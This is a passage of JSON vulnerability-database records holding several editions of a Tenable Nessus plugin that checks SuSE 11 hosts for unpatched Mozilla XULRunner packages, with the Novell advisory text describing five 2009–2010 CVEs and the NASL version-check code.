cpu:\"x86_64\", reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-translations-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "SuSE 11 Security Update : Mozilla XULRunner (SAT Patch Number 2033)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:52:13"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Mozilla XUL Runner engine 1.9.0 was upgraded to version 1.9.0.8, fixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via TippingPoint's Zero Day Initiative that Mozilla's implementation of Web Workers contained an error in its handling of array data types when processing posted messages. This error could be used by an attacker to corrupt heap memory and crash the browser, potentially running arbitrary code on a victim's computer. (MFSA 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research reported that the HTML parser incorrectly freed used memory when insufficient space was available to process remaining input. Under such circumstances, memory occupied by in-use objects was freed and could later be filled with attacker-controlled text. These conditions could result in the execution or arbitrary code if methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft Vulnerability Research reported that the properties set on an object passed to showModalDialog were readable by the document contained in the dialog, even when the document was from a different domain. This is a violation of the same-origin policy and could result in a website running untrusted JavaScript if it assumed the dialogArguments could not be initialized by another site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day Initiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported that when a SVG document which is served with Content-Type: application/octet-stream is embedded into another document via an tag with type='image/svg+xml', the Content-Type is ignored and the SVG document is processed normally. A website which allows arbitrary binary data to be uploaded but which relies on Content-Type: application/octet-stream to prevent script execution could have such protection bypassed. An attacker could upload a SVG document containing JavaScript as a binary file to a website, embed the SVG document into a malicous page on another site, and gain access to the script environment from the SVG-serving site, bypassing the same-origin policy. (MFSA 2010-05 / CVE-2010-0162)", "edition": 1, "hash": "7b5c68f5fe646420289ee7ffb7d96c1c76ed59d72d6a1f47643abd4b97753c1b", "hashmap": [{"hash": "ab3f1038294b2799bcc02c9464f5952d", "key": "description"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "52a5411e7f071cae984d40f6bc064674", "key": "title"}, {"hash": "dbfc53466ca83eb2eefb40bea32f0b30", "key": "cvelist"}, {"hash": "b4a6e2d3ea9db02b543b396cfe424eb8", "key": "published"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "7ffda9669264dbb8d98fe2f4177b79f6", "key": "modified"}, {"hash": "3befc94faf03f2e4f184edfa4abb681f", "key": "href"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "df053f48c25080deac7d5ccc19caabdb", "key": "sourceData"}, {"hash": "273ea7552f2fedc728d1462e7791434b", "key": "pluginID"}, {"hash": "e938db2f4082460794bd2e693f4f3112", "key": "references"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44909", "id": "SUSE_11_MOZILLA-XULRUNNER190-100219.NASL", "lastseen": "2016-09-26T17:25:52", "modified": "2013-10-25T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.2", "pluginID": "44909", "published": "2010-02-25T00:00:00", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=576969", "http://www.mozilla.org/security/announce/2010/mfsa2010-03.html", "http://support.novell.com/security/cve/CVE-2010-0159.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-02.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-05.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-04.html", "http://support.novell.com/security/cve/CVE-2009-3988.html", "http://support.novell.com/security/cve/CVE-2009-1571.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-01.html", "http://support.novell.com/security/cve/CVE-2010-0160.html", "http://support.novell.com/security/cve/CVE-2010-0162.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44909);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2013/10/25 23:52:02 $\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n\n script_name(english:\"SuSE 11 Security Update : Mozilla XULRunner (SAT Patch Number 2033)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla XUL Runner engine 1.9.0 was upgraded to version 1.9.0.8,\nfixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several\n stability bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these crashes\n showed evidence of memory corruption under certain\n circumstances and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via\n TippingPoint's Zero Day Initiative that Mozilla's\n implementation of Web Workers contained an error in its\n handling of array data types when processing posted\n messages. This error could be used by an attacker to\n corrupt heap memory and crash the browser, potentially\n running arbitrary code on a victim's computer. (MFSA\n 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported that the HTML parser incorrectly freed used\n memory when insufficient space was available to process\n remaining input. Under such circumstances, memory\n occupied by in-use objects was freed and could later be\n filled with attacker-controlled text. These conditions\n could result in the execution or arbitrary code if\n methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft\n Vulnerability Research reported that the properties set\n on an object passed to showModalDialog were readable by\n the document contained in the dialog, even when the\n document was from a different domain. This is a\n violation of the same-origin policy and could result in\n a website running untrusted JavaScript if it assumed the\n dialogArguments could not be initialized by another\n site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day\nInitiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported\n that when a SVG document which is served with\n Content-Type: application/octet-stream is embedded into\n another document via an tag with type='image/svg+xml',\n the Content-Type is ignored and the SVG document is\n processed normally. A website which allows arbitrary\n binary data to be uploaded but which relies on\n Content-Type: application/octet-stream to prevent script\n execution could have such protection bypassed. An\n attacker could upload a SVG document containing\n JavaScript as a binary file to a website, embed the SVG\n document into a malicous page on another site, and gain\n access to the script environment from the SVG-serving\n site, bypassing the same-origin policy. (MFSA 2010-05 /\n CVE-2010-0162)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-01.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-03.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-04.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-05.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=576969\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1571.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0159.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0160.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0162.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 2033.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-translations-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "SuSE 11 Security Update : Mozilla XULRunner (SAT Patch Number 2033)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:25:52"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs-32bit"], "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Mozilla XUL Runner engine 1.9.0 was upgraded to version 1.9.0.8, fixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via TippingPoint's Zero Day Initiative that Mozilla's implementation of Web Workers contained an error in its handling of array data types when processing posted messages. This error could be used by an attacker to corrupt heap memory and crash the browser, potentially running arbitrary code on a victim's computer. (MFSA 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research reported that the HTML parser incorrectly freed used memory when insufficient space was available to process remaining input. Under such circumstances, memory occupied by in-use objects was freed and could later be filled with attacker-controlled text. These conditions could result in the execution or arbitrary code if methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft Vulnerability Research reported that the properties set on an object passed to showModalDialog were readable by the document contained in the dialog, even when the document was from a different domain. This is a violation of the same-origin policy and could result in a website running untrusted JavaScript if it assumed the dialogArguments could not be initialized by another site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day Initiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported that when a SVG document which is served with Content-Type: application/octet-stream is embedded into another document via an tag with type='image/svg+xml', the Content-Type is ignored and the SVG document is processed normally. A website which allows arbitrary binary data to be uploaded but which relies on Content-Type: application/octet-stream to prevent script execution could have such protection bypassed. An attacker could upload a SVG document containing JavaScript as a binary file to a website, embed the SVG document into a malicous page on another site, and gain access to the script environment from the SVG-serving site, bypassing the same-origin policy. (MFSA 2010-05 / CVE-2010-0162)", "edition": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "hash": "d08f0939c5b37f00c430bdfa38e26be9b6429884f73331efcfdbd1dc07e44e1e", "hashmap": [{"hash": "ab3f1038294b2799bcc02c9464f5952d", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "52a5411e7f071cae984d40f6bc064674", "key": "title"}, {"hash": "dbfc53466ca83eb2eefb40bea32f0b30", "key": "cvelist"}, {"hash": "b4a6e2d3ea9db02b543b396cfe424eb8", "key": "published"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3befc94faf03f2e4f184edfa4abb681f", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "8fd3c0d10643d313d61153df455e9f87", "key": "modified"}, {"hash": "cf10a5824dfd44d4c24d75f296a10058", "key": "cpe"}, {"hash": "273ea7552f2fedc728d1462e7791434b", "key": "pluginID"}, {"hash": "e938db2f4082460794bd2e693f4f3112", "key": "references"}, {"hash": "740a0956994833a204c3db234be57d8d", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44909", "id": "SUSE_11_MOZILLA-XULRUNNER190-100219.NASL", "lastseen": "2017-10-29T13:42:42", "modified": "2016-12-21T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "44909", "published": "2010-02-25T00:00:00", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=576969", "http://www.mozilla.org/security/announce/2010/mfsa2010-03.html", "http://support.novell.com/security/cve/CVE-2010-0159.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-02.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-05.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-04.html", "http://support.novell.com/security/cve/CVE-2009-3988.html", "http://support.novell.com/security/cve/CVE-2009-1571.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-01.html", "http://support.novell.com/security/cve/CVE-2010-0160.html", "http://support.novell.com/security/cve/CVE-2010-0162.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44909);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:20 $\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n\n script_name(english:\"SuSE 11 Security Update : Mozilla XULRunner (SAT Patch Number 2033)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla XUL Runner engine 1.9.0 was upgraded to version 1.9.0.8,\nfixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several\n stability bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these crashes\n showed evidence of memory corruption under certain\n circumstances and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via\n TippingPoint's Zero Day Initiative that Mozilla's\n implementation of Web Workers contained an error in its\n handling of array data types when processing posted\n messages. This error could be used by an attacker to\n corrupt heap memory and crash the browser, potentially\n running arbitrary code on a victim's computer. (MFSA\n 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported that the HTML parser incorrectly freed used\n memory when insufficient space was available to process\n remaining input. Under such circumstances, memory\n occupied by in-use objects was freed and could later be\n filled with attacker-controlled text. These conditions\n could result in the execution or arbitrary code if\n methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft\n Vulnerability Research reported that the properties set\n on an object passed to showModalDialog were readable by\n the document contained in the dialog, even when the\n document was from a different domain. This is a\n violation of the same-origin policy and could result in\n a website running untrusted JavaScript if it assumed the\n dialogArguments could not be initialized by another\n site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day\nInitiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported\n that when a SVG document which is served with\n Content-Type: application/octet-stream is embedded into\n another document via an tag with type='image/svg+xml',\n the Content-Type is ignored and the SVG document is\n processed normally. A website which allows arbitrary\n binary data to be uploaded but which relies on\n Content-Type: application/octet-stream to prevent script\n execution could have such protection bypassed. An\n attacker could upload a SVG document containing\n JavaScript as a binary file to a website, embed the SVG\n document into a malicous page on another site, and gain\n access to the script environment from the SVG-serving\n site, bypassing the same-origin policy. (MFSA 2010-05 /\n CVE-2010-0162)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-01.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-03.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-04.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-05.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=576969\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1571.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0159.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0160.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0162.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 2033.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 94, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-translations-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "SuSE 11 Security Update : Mozilla XULRunner (SAT Patch Number 2033)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2017-10-29T13:42:42"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "cf10a5824dfd44d4c24d75f296a10058"}, {"key": "cvelist", "hash": "dbfc53466ca83eb2eefb40bea32f0b30"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": 